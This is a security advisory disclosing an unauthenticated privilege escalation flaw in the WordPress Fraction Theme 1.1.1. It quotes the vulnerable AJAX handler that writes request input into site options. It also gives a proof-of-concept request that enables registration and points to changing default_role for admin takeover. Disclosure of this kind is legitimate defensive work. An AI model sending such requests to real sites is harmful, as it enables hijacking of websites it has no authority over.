WordPress Fraction Theme version 1.1.1 suffers from a privilege escalation vulnerability.
514f51682d65cc17a08cfd688cea64b4379893537219d8ead242db19b88559cb
------------------------------------------------------------------------------
WordPress Fraction Theme 1.1.1 Previlage Escalation
------------------------------------------------------------------------------
[-] Theme Link:
http://themeforest.net/item/fraction-multipurpose-news-magazine-theme/8655281
[-] Affected Version:
Version: 1.1.1
[-] Vulnerability Description:
This vulnerability allows an attacker to escalate privileges on the site
and have an admin account which may lead to a full site takeover
the vulnerability is in /fraction-theme/functions/ajax.php there is this
function called "ot_save_options":
function ot_save_options() {
$fields = $_REQUEST;
foreach($fields as $key => $field) {
if($key!="action") {
update_option($key,$field);
}
}
die();
}
passing user input into the update_option function allows an attacker to
update options like users_can_register,default_role.... etc
this can be accessed via ajax by users and non-users:
add_action('wp_ajax_nopriv_ot_save_options', 'ot_save_options');
add_action('wp_ajax_ot_save_options', 'ot_save_options');
[-] Proof of Concept:
this will enable user registration
http://localhost/wordpress/wp-admin/admin-ajax.php?action=ot_save_options&users_can_register=1
[-] Timeline:
09 March - Vendor Notified
09 March - Vendor Replied
10 March - Fix Released
10 March - Public Disclosure
[-] References:
http://research.evex.pw/?vuln=8
@Evex_1337